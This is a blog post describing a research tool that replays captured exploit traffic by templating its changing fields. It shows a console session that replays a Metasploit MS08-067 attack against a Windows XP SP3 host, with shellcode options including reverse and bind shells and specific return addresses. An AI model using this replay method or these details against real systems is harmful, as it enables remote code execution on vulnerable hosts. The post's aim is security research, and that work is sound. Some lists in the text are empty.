I’ve been working on the GSOC Project 14 in recent months. We are meant to start a new tool which can replay the collected exploit traces.
We know that during the process of exploit replay, there’re many fields need to be changed in the original application messages. Some of them are platform independent, and the others are platform specific. Platform-independent variables are those changed each time we exploit, like timestamp, cookie, length, etc. And platform-specific variables are those changed only if the target system is changed, like target address, return address point to the shellcode.
As a preprocessing stage, all the variables need to be marked out in the application messages, so we have a Discoverer module to extract the common exploit template from a pack of exploit traces aiming at certain vulnerability. Then the rest part of this article is a brief introduction about how to perform replay with the exploit template.
Replayer do the following work:
I have done some experiments based on the ms08-067 vulnerability. First I used Metasploit to attack a xp sp2 target host and captured the packets. Then made it into exploit template. After that, I used Replayer to perform an attack to a xp sp3 host. Here’s the result:
[email protected]:~/Work/workspace/replayer$ ./replayer profile2.xml
TraceXploit (POC) Replayer 0.1
by Zhongjie Wang 2010.8.15
Loading exploit template 'profile2.xml'...ok.
Retrieving arguments list...ok.
[Basic User Options]
(which are related to target environment, like ip, port, etc.)
Select target OS:
0. Automatic Targeting
1. Windows 2000
2. Windows XP SP1 Simplified Chinese
3. Windows XP SP2 Simplified Chinese
4. Windows XP SP3 Simplified Chinese
Input the number: 4
[Advanced User Options]
(which are related to the vulnerability we're exploiting.)
Variable name: smbpipe
Variable type: arguments
Possible values: BROWSER, SRVSVC
Input the value: BROWSER
(which user can customize shellcode and return address.)
Here're all the shellcode available:
1. Windows Cmd Shell, Bind TCP Inline
2. Windows Cmd Shell, Reverse TCP Inline
3. Windows Execute Command
Please input the number: 3
* windows/exec - 196 bytes *
* http://www.metasploit.com *
* Encoder: generic/none *
Cmd to run:calc
shellcode has been replaced.
auto selected return address 'disablenx': 0x58fc17c2
auto selected return address 'jmpesi': 0x58fbf807
Begin to replay exploit to 18.104.22.168:445...
Data flow in hex format is saved into 'dataflow.txt'.
Update variable 'ip' in seq 0 msg 8, offset 50.
Update variable 'smbpipe' in seq 0 msg 10, offset 88.
Update variable 'length_18' in seq 0 msg 18, offset 1.
in seq 0. Connection reset by peer
replay has been done.
The hex data transfered between two machines are saved into ‘dataflow.txt’ which is also attached.
In this version of replayer, following variable types are taken into consideration: